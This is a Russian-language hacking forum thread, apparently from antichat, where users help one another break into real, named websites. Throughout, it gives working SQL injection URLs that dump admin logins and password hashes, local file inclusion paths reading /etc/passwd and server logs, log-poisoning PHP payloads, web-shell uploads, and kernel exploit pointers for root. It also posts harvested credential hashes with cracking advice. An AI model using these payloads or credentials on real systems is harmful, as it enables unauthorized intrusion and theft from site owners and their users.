нет, как поиметь этот сайт...
У меня рутовый пасс был от сайта на том же двигле. в принципе некоторые скрипты остались.

.php?set_language=../../../../../../../../../../../../etc/passwd%00

дальше объяснять?

мне тут в репу написали про авторизацию
ну да, так насколько я пноимаю это скрипт админки, соответсвенно для эксплуатации уязвимости нужно быть залогиненым под админом

/home/www/www.****.com/mothers/.htaccess

AuthUserFile /home/www/www.****.com/admin/.htpasswd
AuthName "Embracing Motherhood Mothers Section"
AuthType Basic

require valid-user


/home/www/www.****.com/admin/.htpasswd


nicyr:NSqcB/LOr6Ryw
meahans:X5qeSZwCEAM8M



Чем расштфровать?

farpost, DES, можешь помучать Passwords Pro

чет непойму

узнаю таблицы все норм...
http://site.com/body.php?id=-1+union+all+select+1,2,3,table_name,5,6,7,8+from+i nformation_schema.tables+limit+1,1--
допустим таблица admin

узнаю колонки тож все норм...
http://site.com/body.php?id=-1+union+all+select+1,2,3,column_name,5,6,7,8+from+ information_schema.columns+where+table_name=0x6164 6d696e--

а вот дальше появляется ошибка даж на этом моменте:
http://site.com/body.php?id=-1+union+all+select+1,2,3,4,5,6,7,8+from+admin+limi t+1,1--
Warning: Supplied argument is not a valid MySQL result resource in /home/www/class.php on line 147........

в чем проблема ???

попробуй UNION+SELECT+
а лучше линк в студию

Adm1n4eG,

1. Посмотри в какой бд таблица.
2. Сколько в ней записей.

Может быть что там идет например 2 гверя а при - limit+1,1 нету там столько вот и во второй запрос идет пустое значение, крч линк в студию а то так можно долго гадать.

union+select тож пробовал не получается(
и причем подставляю любую таблицу всеравно ошибка появляется...
пробовал пробелы + /**/ ставить...
пробовал хешировать название таблиц по разному тож не выходит (((
насчет лимита нет он тут не причем по идее ошибки не должно быть уже при
http://site.com/body.php?id=-1+union+all+select+1,2,3,4,5,6,7,8+from+admin--

DATABASE():db_handset
VERSION():5.0.27-standard-log
78 таблиц в базе

извенить линк дать не могу...

В какой бд таблица admin?

2 Adm1n4eG
try

http://site.com/body.php?id=-1+union+all+select+1,2,3,concat(0x3a,table_name,0x 3a,table_schema),5,6,7,8+from+i nformation_schema.tables+limit+1,1--

Тогда уж лимит+17,1 :)

Adm1n4eG, вот, читай: http://forum.antichat.ru/thread104591.html

Читай там вопрос номер 3.

Тебе же сказали:

1. http://site.com/body.php?id=-1+union+all+select+1,2,3,count(*),5,6,7,8+from+adm in--

- подсчитает колв-во записей в админ, если ноль - то чего вы хочите, как грица

2. . http://site.com/body.php?id=-1+union+all+select+1,2,3,table_schema+from+informa tion_schema.columns+where+table_name=0x61646d696e

- узнай точную БД, где находится табла admin, может просто не в текущей БД, а потом делай запросы подставляя сначала название_бд.admin

3. unhex(hex(данные)), aes_decrypt(aes_encrypt(данные)) - просто несповпадение кодировок, в общем проверяй

4. Просто нет прав на чтение данной таблицы у текущего юзера

Тож забыл сразу сказать в таблице admin есть 2 колонки account и pwd но почему то при проверке count(*) все равно появилась ошибка...

R1dex большое спасибо!!!

Adm1n4eG, вот, читай: http://forum.antichat.ru/thread104591.html
Читай там вопрос номер 3.

эт я както упустил )))
все таки оказалось что таблица находится не в той базе с которой работает скрип
проверил это таким образом:

http://site.com/body.php?id=-1+union+select+1,2,3,table_schema,5,6,7,8+from+inf ormation_schema.tables+where+table_name=0x61646d69 6e--
Запрос выдал: bwbvdisk

Итоговый запрос и получение админского логина и пасса:
http://site.com/body.php?id=-1+union+all+select+1,2,3,concat_ws(char(58),accoun t,pwd),5,6,7,8+from+bwbvdisk.admin+limit+0,1--

Всем кто помогал спс!

подсчитает колв-во записей в админ, если ноль - то чего вы хочите, как грица
ну вообще если в таблице нет ниодной записи ошибки не будет, а на страницу выведуться null'и
пробуй select user from mysql.user limit 9999999

Можно ли в подзапросах обойтись без использования from? Union фильтруется,как и from

нет, искать обход фильтра

какой обход? фильтрация всей конструкции select from

Если встречается select from подряд,то форбидн.А вот если from select или отдельно,то нет.

смотря какая фильтрация - есть грамотная, и ничего сделать нельзя, а есть дурацкая, и тогда можно всё. Мало инфы выдаешь - столько тусить УЖЕ на ачаде и так тупить, есть ли ошибки, выводящиеся на экран, нет их, и etc. Выдавай сразу МНОГО, ОЧЕНЬ МНОГО, ПО МАКСИМУМУ инфы, не заставляй флудить, ибо ведет такое общение к полному игнору

ЗЫЖ Надо же, успел отпостить:)))

Вот по результатам выводимых ошибок и ориентируйся - SELECT FROM, SElecT FrOM, selSELECTect FrFRomOM и etc. Пробуй в общем

select from насколько я помню это древняя защита sweb-хостинга
Отправляй данные не Гетом, а Постом
https://forum.antichat.ru/showthread.php?t=56409

выудил из бд... но я не знаю что здесь за хеш, кто может мне помочь, буду очень благодарен
smomanyi:a750e0be90a80128d99c46278e3c2af47fa83a162 72fe77e8596da00d34fdda9
jmgutu:1c8bfe8f801d79745c4631d09fff36c82aa37fc4cce 4fc946683d7b336b63032

SHA-256 походу

выудил из бд... но я не знаю что здесь за хеш, кто может мне помочь, буду очень благодарен
smomanyi:a750e0be90a80128d99c46278e3c2af47fa83a162 72fe77e8596da00d34fdda9
jmgutu:1c8bfe8f801d79745c4631d09fff36c82aa37fc4cce 4fc946683d7b336b63032
http://www.insidepro.com/hashes.php?lang=eng
ищи и сравнивай :)

Не надо ничего искать и сравнивать, всё уже сделано до нас:

http://bug-track.ru/prog/encoder1.0.rar - вставить хеш и посмотреть вниз

Вопрос по скуле.
Имеем:
http://stat.vbios.com/bf2/?rid=19708+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16 -- 1
http://stat.vbios.com/bf2/?rid=19708+order+by+16 -- 1
Чтоже не правильно то,пишет все время что колумнов не правильно подобрал я :(
Tables: kills, maps

хз короче, но вот это:


http://stat.vbios.com/bf2/?rid=19708+or+1=1+and+substring(version(),1,1)=5


отличается от всего остального

значит читай про BLIND-SQL там поймешь как ее раскрутить :)

Слышал что в ллокальном инклуде можно залить шелл удалённо. Это действительно так? и каким способом? подскажите плиз.

Слышал что в ллокальном инклуде можно залить шелл удалённо. Это действительно так? и каким способом? подскажите плиз.

https://forum.antichat.ru/showpost.php?p=1088072&postcount=11

A vulnerability found in the popular bittorrent tracker TBSource code allows an attacker to inject SQL queries and read secret information from the database.
The value of 'choice' passed to the script index.php is not properly sanitized. When a special tailored value is passed by an attacker, full reading access to the database is possible.
Some projects based in TBSource like TBDev and TorrentStrike have been found to be affected by the same vulnerability.

Bug discovered by Emiliano Scavuzzo
можете помочь сделать этот injection?

можете помочь сделать этот injection?
Посмотрел, короче будет работать только если:

1) залогиниться
2) юзер хоть раз участвовал в голосовании

Уязвимый запрос:
sql_query("INSERT INTO pollanswers VALUES(0, $pollid, $userid, $choice)") or sqlerr(__FILE__, __LINE__);тогда можно в к примеру сделать так:http://test1.ru:8012/tbdev/
POST choice=111 and if(substring(version(),1,1)=5,(select 1 union select 2),2)

Qwazar
попробовал на tb source alfa
дало sql error
Subquery returns more than 1 row
что делать?

что делать?
Читать статьи:
https://forum.antichat.ru/threadnav43966-1-10.html
http://forum.antichat.ru/threadnav35207-1-10.html
https://forum.antichat.ru/thread119047.html
https://forum.antichat.ru/thread19844.html

После прочтения , если останутся вопросы , сюда спрашивать.

Уязвим параметр 'choice' в index.php, значит post'ом в в choice раскручиваешь данную багу. Но есть один момент - на главной должна обязательно быть голосовалка и надо быть авторизованым, иначе раскрутить не получиться...

nemaniak
да это понятно, но вот раскрутить не удаётся, азы sql inj я знаю, но всё равно не получается...

nemaniak
да это понятно, но вот раскрутить не удаётся, азы sql inj я знаю, но всё равно не получается... Ты статьи почитай от начала и до конца. Ссылки дал jokester выше. Там всё есть.

nemaniak
азы sql inj я знаю.
Начни лучше с азов MySQL, попробуй на локал хосте попрактиковаться, в том phpMyAdmin и etc. а то не понимая самого языка толку не много будет "делать все как в статье".

PaCo
Я знаю язык mysql очень хорошо..

PaCo
у меня именно этот случай не получается с POST'ом

vitgob, у тебя как раз тот случай. И хватит сообщения плодить, прочитай те статьи поймёшь что в запросе значит if() и что в данном случае значит ошибка subquery returns more then 1 row.

Hint: На том серваке на котором ты проверял ошибку - 5я версия MySql. (И POST тут не при чём).

PaCo
у меня именно этот случай не получается с POST'ом
Что значит "не получается"?
Что конкретно не получается?
Чего ты ждёшь от запроса?
Какой результат по твоему должен быть?
Причём тут "не получается с POST"?
Если ты пишешь:
Я знаю язык mysql очень хорошо..
То видимо в состоянии ответить на вопрос почему у тебя получается такая ошибка:
Subquery returns more than 1 row

Что ты хочешь что-бы тебе тут посоветовали? Запрос который выводит логин и пароль админа, или что? Или вывод кнопки залить шелл? Так не получится.

Эта скуль слепая, т.е. без вывода + есть условия для эксплуатации,их тебе описали, её нужно расскручивать если ты знаешь синтаксис Mysql , то это труда не составит, если нет, читай статьи которые я тебе показал и ПО ПРОЧТЕНИЮ задавай вопросы.

Т.е. например: "я делаю так-то и так-то , жду, что будет то-то и то-то, а мне выдаёт то-то и то-то"
Вот как-то так

Люди не посчитайте мои вопросы сильно тупыми но я новичек в этом.

1. немного раскажи о limit+__. как я понял нужно ставить 0.1 или 1,1 или 2,1. Ставил каждый вариант появляются разные списки таблиц. так какой же нужно ставить?

2. после того как я получил список таблиц (5 ветка), что бы получить список колонок именно какой то таблицы то эту же таблицу нужно перевести в хек. Как мне это сделать?

3. если я получил пороль зашифрованый в MD5 то какой прагой его расшифровать? сколько приблизительно времени расшифровается пороль? и какие шансы что прага его расшифрует?

http://forum.antichat.ru/thread43966.html
ну неужели так сложно прочитать эту статью?
там ведь все есть. здесь постят вопросы конкретно по раскрутке конкретных скулей, а написанию еще одной статьи по sql инджекту

я её читал но на данные вопросы ответов не нашел.
Вам че трудно обьяснить малость.

Люди не посчитайте мои вопросы сильно тупыми но я новичек в этом.

1. немного раскажи о limit+__. как я понял нужно ставить 0.1 или 1,1 или 2,1. Ставил каждый вариант появляются разные списки таблиц. так какой же нужно ставить?

2. после того как я получил список таблиц (5 ветка), что бы получить список колонок именно какой то таблицы то эту же таблицу нужно перевести в хек. Как мне это сделать?

3. если я получил пороль зашифрованый в MD5 то какой прагой его расшифровать? сколько приблизительно времени расшифровается пороль? и какие шансы что прага его расшифрует?



1) при каждом Limit x.1

x= {1,2,3,4,5,6,...}
ответ ЛЮБОЙ )))тока при каждом x будут выданы тебе свои таблицы

в среднем ищи таблицы где есть название user,members, и т.д что связано с юзерами )))

2)найти скрипты, проги , сервисы где переводят

пока робит на

__http://haxta4ok.wallst.ru/tools.php в первую строку вводиш - он тебе даст что тебе надо


пример :

http://sait.mda/index.php?id=1+union+select+1,2,column_name,4,5,6+ from+information_schema.tables+where+table_name=0x 75736572

0x75736572=user в хеке

И тут он тебе выдаст имена колонок в таблице user

3)http://passcracking.ru/index.php тут пробуй)))

вопрос, если у меня есть в конце ссылки параметр .........uname=vvvvvv' - я подставил кавычку и в ответ мне пишeт: vvvvvv'
There is no available information for vvvvvv'

Можно ли это считать SQL inj?

вопрос, если у меня есть в конце ссылки параметр .........uname=vvvvvv' - я подставил кавычку и в ответ мне пишeт: vvvvvv'
There is no available information for vvvvvv'

Можно ли это считать SQL inj?
нет, попробуй на xss

помогите найти ошибку в запросе, вроде версия 5...но всё же...
http://www.webkatalog.kiev.ua/section.php?kat=1&subkat=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 ,13,14,15,16,17+from+information_schema.tables+whe re+table_schema=%27webkat_baze%27

http://www.webkatalog.kiev.ua/section.php?kat=1&subkat=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 ,13,14,15,16,17+from+information_schema.tables+--

ТЫ не поставил комментарий, он нужен для того чтобы обрубить "AND status=1 ORDER BY ocenka desc, view desc, date2 asc LIMIT 0,10 "

так там всего 3 поля, откуда ты 17 то взял?
Вот в виде table_schema,table_name,column_name:

webkat_baze:0links:id
webkat_baze:0links:name
webkat_baze:0links:text
webkat_baze:0links:url
webkat_baze:0links:date1
webkat_baze:0links:date2
webkat_baze:kat:id
webkat_baze:kat:name
webkat_baze:links_partner:date
webkat_baze:links_partner:links
webkat_baze:links_partner:id
webkat_baze:site:id
webkat_baze:site:kat
webkat_baze:site:subkat
webkat_baze:site:url
webkat_baze:site:name
webkat_baze:site:info
webkat_baze:site:keywords
webkat_baze:site:status
webkat_baze:site:date
webkat_baze:site:date2
webkat_baze:site:iphost
webkat_baze:site:view
webkat_baze:site:user
webkat_baze:site:email
webkat_baze:site:nashbutton
webkat_baze:site:ocenka
webkat_baze:site:tmp2
webkat_baze:subkat:id
webkat_baze:subkat:kat
webkat_baze:subkat:name

http://www.webkatalog.kiev.ua/section.php?kat=1&subkat=-1%20union%20select+1,2,3,4,column_name,6,7,8,9,10, 11,12,13,14,15,16,17%20from%20information_schema.c olumns+where+table_name=0x555345525f50524956494c45 474553+--&page=1

M.W.N.N., я тоже сначала так считал, но при 3-х полях мне не выводился принтабельный столбец!

Все там отлично выводится, принтабельное поле после слов: Каталог > Авто/мото >

Смотри выше, я выложил в пред идущем посте таблицы и колонки

M.W.N.N., можешь рассказать, как ты такую таблицу вывел, пожалуйста)

Через дампер

Krist_ALL, может и тупой вопрос, но всё же, почему же тогда запрос http://www.webkatalog.kiev.ua/section.php?kat=1&subkat=-1+union+select+1,2,3,4,column_name,6,7,8,9,10,11,1 2,13,14,15,16,17+from+information_schema.columns+w here+table_name=%27user%27+--
не катит?)

Krist_ALL, может и тупой вопрос, но всё же, почему же тогда запрос http://www.webkatalog.kiev.ua/section.php?kat=1&subkat=-1+union+select+1,2,3,4,column_name,6,7,8,9,10,11,1 2,13,14,15,16,17+from+information_schema.columns+w here+table_name=%27user%27+--
не катит?)

нет там таблицы user, и в любом случае при таком методе имя таблицы переводи в HEX, когда кавычки фильтруются.

Чтобы руками не перебирать все, юзаем sipt. но КТО НЕ ЗНАЕТ КАК СДЕЛАТЬ РУКАМИ ИНЕКЦИЮ НЕ ЮЗАЙТЕ СИПТ! Если что-то делать, так с умом.

нет там таблицы user, и в любом случае при таком методе имя таблицы переводи в HEX, когда кавычки фильтруются.
там есть табла юзер =) Но да, кавычки фильтруются - нужно хексить или чарить =)
а сипт ненуюно юзать - там 5 версия, всё и атк просто ;)

__http://www.xakep.ru/post/45088/default.asp


народ ..тут видео как чел нашел багу в SMF 1.1.4, он использует прогу Odysseus не подскажите в чем у меня косяк , когдая вроде делаю все тоже самое тока у меня почему то не вылезают те ошибки которые у него ??

P.S. мб я скачал уже пропатченную версию?, хотя код вроде тот же самый что и у него......юзаю оперу

// Let's not depend on the ini settings... why even have COOKIE in there, anyway?
$_REQUEST = $_POST + $_GET;

// Make sure $board and $topic are numbers.
if (isset($_REQUEST['board']))
{
// Make sure that its a string and not something else like an array
$_REQUEST['board'] = (string) $_REQUEST['board'];

// If there's a slash in it, we've got a start value! (old, compatible links.)
if (strpos($_REQUEST['board'], '/') !== false)
list ($_REQUEST['board'], $_REQUEST['start']) = explode('/', $_REQUEST['board']);
// Same idea, but dots. This is the currently used format - ?board=1.0...
elseif (strpos($_REQUEST['board'], '.') !== false)
list ($_REQUEST['board'], $_REQUEST['start']) = explode('.', $_REQUEST['board']);
// Now make absolutely sure it's a number.
$board = (int) $_REQUEST['board'];

// This is for "Who's Online" because it might come via POST - and it should be an int here.
$_GET['board'] = $board;
}
// Well, $board is going to be a number no matter what.
else
$board = 0;

// If there's a threadid, it's probably an old YaBB SE link. Flow with it.
if (isset($_REQUEST['threadid']) && !isset($_REQUEST['topic']))
$_REQUEST['topic'] = $_REQUEST['threadid'];

// We've got topic!
if (isset($_REQUEST['topic']))
{
// Make sure that its a string and not something else like an array
$_REQUEST['topic'] = (string)$_REQUEST['topic'];

// Slash means old, beta style, formatting. That's okay though, the link should still work.
if (strpos($_REQUEST['topic'], '/') !== false)
list ($_REQUEST['topic'], $_REQUEST['start']) = explode('/', $_REQUEST['topic']);
// Dots are useful and fun ;). This is ?topic=1.15.
elseif (strpos($_REQUEST['topic'], '.') !== false)
list ($_REQUEST['topic'], $_REQUEST['start']) = explode('.', $_REQUEST['topic']);

$topic = (int) $_REQUEST['topic'];

// Now make sure the online log gets the right number.
$_GET['topic'] = $topic;
}


если что прога вот

__http://komm.gaz.ru/doka/doc/online/XAKER/Xaker01_2009_dvd/files/soft/Windows/Security/Odysseus%202.0.0.84/Odysseus-2-0-0-84.exe

При добавлении кавычки ' (/index.php?page=19') вылитает такая ошибка:

Warning: require(.dat) [function.require]: failed to open stream: No such file or directory in /home/host.ru/public_html/index.php on line 46

Fatal error: require() [function.require]: Failed opening required '.dat' (include_path='.:/usr/lib/php') in /home/host.ru/public_html/index.php on line 46

Я в скуль иньекциях ток пытаюсь разобратся, подскажите что в данном случае можно сделать?

в данном случае это не sql-inj а php инклуд.
т.е. вы можете попробовать поинклудить (просмотреть) файл на сервере (LFI) либо можете проинклудить шелл с удаленного сервера (RFI)

доп.информацию можете почитать в соседних топиках, там всё это есть.

Нету там помойму нече. Просто при подстановке некоторых символов оно выводит ошибку.

Является ли такой запрос опасным? (в плане sql-inj)

"SELECT ... WHERE `id` = '".(int)$_GET['id']."'"

Если да то как примерно все это реализовывается? (там же токо число выводят, если get запрос будет таким id=9999+union+... то наврятли что-то выполнится(sql))

Является ли такой запрос опасным? (в плане sql-inj)

"SELECT ... WHERE `id` = '".(int)$_GET['id']."'"

Если да то как примерно все это реализовывается? (там же токо число выводят, если get запрос будет таким id=9999+union+... то наврятли что-то выполнится(sql))


нет так как стоит (int )

нет так как стоит (int )

Но в плане раскрытия путей может быть опасно, т.к. не предотрващает отрицательного значения данных, хотя я скорее всего неправ, и даже наверняка, думаю поправят, если что:)

:) врятли там получится раскрытие путей ))так как Int значение может иметь и отрицательное и положительное (вроде так))))..а если в плане и раскроется путь, то без SQL-inj и mysql.user с MQ=off и f_p = Y и папкой на запись))) смысла ни какого))...будет смысл если тока есть все это на другом сайте с одним IP :) то можно будет попробовать использовать этот путь с подстановкой того сайта :)

P.S если не прав тоже поправте :)

врятли там получится раскрытие путей ))так как Int значение может иметь и отрицательное и положительное (вроде так))))..а если в плане и раскроется путь, то без SQL-inj и mysql.user с MQ=off и f_p = Y и папкой на запись))) смысла ни какого))...будет смысл если тока есть все это на другом сайте с одним IP то можно будет попробовать использовать этот путь с подстановкой того сайта
Не обязательно на одном IP, и что вы все надеетесь на SQL-inj и mysql.user с MQ=off и f_p = Y есть куча других моментов где могут пригодиться пути при заливке шелла, и при выводе ошибок вполне возможно раскрытия пути при не верном SQL запросе или например без проверки на то что вернул запрос и обработка их соотвествуюшими функциями(mysql_fetch_array и etc.) которые могу сгенерировать ошибку.

если ты понял что ты сам написал то пример в студию

P.S. прочти на какой вопрос был дан ответ , умник

если при подстановки в параметарезированный линк кавычки появляется надпись: An error occurred on the server when processing the URL. Please contact the system administrator. Означет ли это, что во всех остальных параметрах будет точно такая же надпись?

П.С. С конструкцией and ошбки не выдает,но обычные страницы показывает.

И еще один вопрос, если при подстановки кавычки появляется пустая страница, то как(кроме запросаand и метода вычислений) заставить вывести имя субд и т.д.?

после этой команды concat_ws(0x3a,LOGIN) я вижу логины пользователей через запятую.
Как сделать так что бы логины пользователей отображались в столбик? тоесть следущий логин начинался с новой строки.

после этой команды concat_ws(0x3a,LOGIN) я вижу логины пользователей через запятую.
Как сделать так что бы логины пользователей отображались в столбик? тоесть следущий логин начинался с новой строки.
не знаю почему через кому...должно по идеи через двоеточие,но что б в столбик
попробуй concat_ws(0x0a,LOGIN)

по данному адресу id=1+union+select+1,2,3,4,concat_ws(0x3a,USERNAME, PASSWORD)6,7,8,9,10+from+USERS+--+ я вижу логин и пасс админа. я его знаю, но админку у него найти так и не смог.
как мне через скул поменять ему пасс.

concat_ws('<br>',LOGIN)

concat_ws('<br>',LOGIN)
немного непонял, ну если колонка PASSWORD , а таблица USERS.

как мне через скул поменять ему пасс
найти пшпмайадмин и там поменять

XXXXXX, concat_ws('<br>',LOGIN)
это чтобы в столбик было
select concat_ws('<br>',LOGIN,PASSWORD) from USERS

найти пшпмайадмин и там поменять
вот именно, я немогу найти админку. все возможные варианты перебрал, неподходят.
Так как через скул?

никак

Дай ссылку в пм, от делать нечего ща поищу админку мож и найду

тогда извеняюся, я думал что через скул модно добавить, изменить данные.
жаль что нельзя.

Дай ссылку в пм, от делать нечего ща поищу админку мож и найду
Есть ли брут для поиска админки, что бы автомотически перебирал путь к админки по словарю

тогда извеняюся, я думал что через скул модно добавить, изменить данные.
жаль что нельзя.


Смотря какая скуль - если в select - то тока читать, если в update или в insert - то изменять и вставлять

что можно узнать полезного из файла /etc/httpd/conf/httpd.conf ???

все настройки веб сервера, а именно:
пути, где располагаются сайты, модули которые подключены к веб серверу, настройки пхп, перла и так далее и тому подобное; куда приинклудены дополнительные настройки, такие как виртуальные хосты, и так далее и тому подобное.

что можно узнать полезного из файла /etc/httpd/conf/httpd.conf ???
если хочеш подробнее то посмотри здесь
http://dklab.ru/doc/apache/httpd.conf.html

подскажите у меня руки кривые или вывода нет??
http://www.emag.ru/pr.php?pr=-10+union+select+1,concat_ws(char(58),username,user _password),3,4,5,6,7,8,9,10+FROM+phpbb_users+limit +5,1000

мега шоп, с ПР5. помогите раскрутить.
при попытках присвоить переменной productid значения -1 или 99999999999 или 1+and+1=1 редиректит на страницу "acess denied"
http://store.awn.com/product.php?productid=15'

подскажите у меня руки кривые или вывода нет??
http://www.emag.ru/pr.php?pr=-10+union+select+1,concat_ws(char(58),username,user _password),3,4,5,6,7,8,9,10+FROM+phpbb_users+limit +5,1000

таблица phpbb_users находится в базе данных SC:
http://www.emag.ru/pr.php?pr=-10+union+select+1,TABLE_SCHEMA,3,4,5,6,7,8,9,10+fr om+information_schema.tables+where+table_name=char (0x70687062,0x625f7573,0x657273)
причем доступа туда нет. Но легко можно прочитать записи из таблицы phpbb_users1, что в базе данных acom:
http://www.emag.ru/pr.php?pr=-10+union+select+1,concat(username,0x3a,user_passwo rd),3,4,5,6,7,8,9,10+from+acom.phpbb_users1+limit+ 1,1
может эти пароли куда-то и подойдут ;)

А как можно перемещатся по БД, ели она не одна??

from имя_базы.таблица

выложите список возможных путей в админку.
ну если неподхожят такие как admin/index.php или admin.php то какие перебирать?

AlexSatter
А как мне узнать имина баз?

AlexSatter
А как мне узнать имина баз?
Если 5-я ветка, то вот так: ?id=-1+union+select+group_concat(table_name)+from+infor mation_schema.tables+group+by+table_schema+limit+1 ,1
или
?id=-1+union+select+concat(table_name)+from+information _schema.tables+limit+17,1 меняй значение limit, чтобы можно было видеть другие таблицы.
Если 4-я ветка, то узнать имена таблиц можно только перебором.

select table_schema from information_schema.tables where table_name='table_name'
для 5той ветки

да мне не таблицы нужны!
а название баз данных!

GOGA075,
...?id=-1+union+select+schema_name+from+information_schema .schemata+limit+x,1
...?id=-1+union+select+group_concat(schema_name)+from+info rmation_schema.schemata

RulleR
Спасибо, работает!!!

вот только у меня 54 БД получилось!!
Так и долдно, или я не туда залез??

вот только у меня 54 БД получилось!!
Так и долдно, или я не туда залез??

туда, легко может быть и намного больше...

Это БД других сайтов рассположенных на данном сервере??

Это БД других сайтов рассположенных на данном сервере??

скорее всего так, но могут быть и несколько БД на один сайт

а как правельно создать запрос на перебор тавлиц к другой БД??

имеется шелл на сайте, но права на все файлы стоят 644, ну вообще везде права граматно расставлены, возможно-ли обойти права и изменить содержимое файла на сервере?

дефейсы и их обсуждения на ачате запрещено.

а как правельно создать запрос на перебор тавлиц к другой БД??

?id=-1+union+select+group_concat(table_name)+from+infor mation_schema.tables+where+table_schema='имя базы'

имеется шелл на сайте, но права на все файлы стоят 644, ну вообще везде права граматно расставлены, возможно-ли обойти права и изменить содержимое файла на сервере?

смотри версию ядра, ищи под неё эксплоит и попробуй порутать, либо ищи пассы разные и пробуй их на ftp, ssh...

Несколько страниц был спор об этом инклуде...у меня вопрос остался

Делаю такой запрос:

http://www.cyl.ru/index.php?lang=ru&page=order2&fcountry=<? system($cmd); ?>

Потом читаю
http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../tmp/sess_adda%00

Выдает

cyl_price_rub|i:4880;cyl_price_dollar|i:148;order_ id|N;country|s:19:"<? system($cmd); ?>";countryname|s:6:"Россия";city|N;oplata|N;oplata_price|N;name|N;zip|N;cityn ame|N;address|N;metro|N;phone|N;calltime|N;email|N ;info|N;the_current_page|s:6:"order2";the_previous_page|s:6:"order2";the_partner|N;user_id|i:181944214;

Полему при LFI не исполнился php код? Что я сделал не так?

Несколько страниц был спор об этом инклуде...у меня вопрос остался

Полему при LFI не исполнился php код? Что я сделал не так?
ОМГ !!! ОМФГ!!!

Несколько страниц было объяснение одному господину, теперь второму нужно объяснить?

Я помоему тебе сразу ответил.

Это не инклуд там file()
вот мой пост:
https://forum.antichat.ru/showpost.php?p=1327108&postcount=7572

А если у кого-то там инклуд, пиши ему в ПМ, и пусть он тебе сам объясняет почему код не исполняется

Помогите пожлауйста найти httpd.conf на этом инклуде

http://www.pubertaetverstehen.ch/index.php?pageid=../../../../../../../../../etc/passwd%00

Помогите пожлауйста найти httpd.conf на этом инклуде

http://www.pubertaetverstehen.ch/index.php?pageid=../../../../../../../../../etc/passwd%00

http://www.pubertaetverstehen.ch/index.php?pageid=/var/log/httpd-access.log%00
217.26.52.37 отсюда логирует...
;)

http://www.pubertaetverstehen.ch/index.php?pageid=/var/log/httpd-access.log%00
217.26.52.37 отсюда логирует...
;)


спс, поставте ему +5.

ЗЫ плиз, не лейте шелл до меня, пожалуйста =)

Ещё вопрос.
http://www.mfa.gov.et/View_Commentaries/View.php?Page=../../../../../../var/log/httpd-access.log

вот лог. Что надо вписаь в инеткряк чтобы оставить запись в этом или еррор логе

=================
Вот ещё:

http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=../../../../../../../../../../../../var/log/httpd-access.log

но мне опять не везёт. php код не выполняется =(

вот запись [29/Jun/2009:12:57:15 +0500] "GET / HTTP/1.1" 200 1456 "-" "<? phpinfo(); ?>"

но мне опять не везёт. php код не выполняется =(

вот запись [29/Jun/2009:12:57:15 +0500] "GET / HTTP/1.1" 200 1456 "-" "<? phpinfo(); ?>"
http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=это%20не%20инклуд

Warning: fopen(articles/это не инклуд):

function CheckExt($filename, $ext)
{
$name = strtolower($filename);
if(substr($name, strlen($name) -3, 3) == $ext)
return true;
else
return false;
}

Этот скрипт уязвим?(он проверяет расш. файла при заливке) Вот что я пытался сделать...
Поскоку скрипт проверяет токо название файла (что за расширение стоит в конце) то я попробывал залить gif а в гифе в конце файла (после ";" (без ковычек)) подставить это

<html><script>alert(//)</script></html>

Подставил... Зашел через IE(картинка битая была при просмотре), в итоге алерта нету! В чем дело?

Спс, jokester. А есть ли скрипт который сам проверят на дефолтные пути к конфигам и логам? в одной теме где дефолтные пути там есть атач от Elekt. Но архив битый, не открывается. Может гдето ещё есть?

ЗЫ можно в дальнеёшем просто joker?

Есть вопрос по Xss уязвимостям: если фильтр фильтрует(ой..) \ заменяя его на html код \ (c semicolons) так вот... возможно ли как то обойти эту фильтрацию?

Залил вебшелл, но у него права nobody, соответственно сильно не разгуляешься (интересует редактирование файлов). Можно ли как то получить права хотя бы юзверя в папку которого залит шелл, кроме как рутать сервак?

Система Freeebsd 6.2.

нужно искать сплоиты, для конкретной версии ядра, в данном случае 6.2, либо попробовать поискать баги в установленной версии веб сервера...
например тут: milw0rm.com

Залил вебшелл, но у него права nobody, соответственно сильно не разгуляешься (интересует редактирование файлов). Можно ли как то получить права хотя бы юзверя в папку которого залит шелл, кроме как рутать сервак?

Система Freeebsd 6.2.
Вроде нет сплоита под 6ку, по крайней мере в паблике.
Можно поискать сплоиты под сервисы, например sendmail.

FreeBSD 6x/7x
http://milw0rm.com/exploits/7581

так как я тормоз, уже не могу третий день раскрутить скулю:
http://regina.kz/shop/index.php?CID=24'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
далее
http://regina.kz/shop/index.php?CID=24+order+by+5+--+

Unknown column '5' in 'order clause'
делаю
http://regina.kz/shop/index.php?CID=24+union+select+1,2,3,4+--+
The used SELECT statements have a different number of columns

потом немножка покурил посимвольный перебор и сипт набрутил это (мускуль=5 ветка):

Имя таблицы:Getted String number 57:mos_users

иду дальше с запросом:
SELECT/**/COLUMN_NAME/**/from/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME=0x6d6f735f7573657273/**/LIMIT/**/{N1-15},1
и получил имена колонок.
далее хочу вытащить значения с таблицы mos_users:
SELECT/**/email/**/from/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME=0x5c276d6f735f75736572735c27/**/LIMIT/**/{N1-5},1
ответ: Unknown column 'email' in 'field list'.
собсно, подскажите плз как вытащить значения с таблицы (table:mos_users; column:name,username,password) и где у меня ошибка?

там рядом есть инъекция проще
http://regina.kz/shop/podrobno.php?CID=999&id=-1+union+select+1,2,username,4,5,6,7,password+from+ mos_users+limit+0,1--

там рядом есть инъекция проще
http://regina.kz/shop/podrobno.php?CID=999&id=-1+union+select+1,2,username,4,5,6,7,password+from+ mos_users+limit+0,1--
мона еще глупый вопрос: как ты подобрал кол-во полей? или мона линк на почитать?

мона еще глупый вопрос: как ты подобрал кол-во полей? или мона линк на почитать?
полагаю так же как и ты, через ORDER BY, см
https://forum.antichat.ru/thread19844.html

Получил я админский акк от булки, залил шелл и мне вылетела не приятная надпись:
Warning: shell_exec() has been disabled for security reasons in /faq.php(302) : eval()'d code(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 361

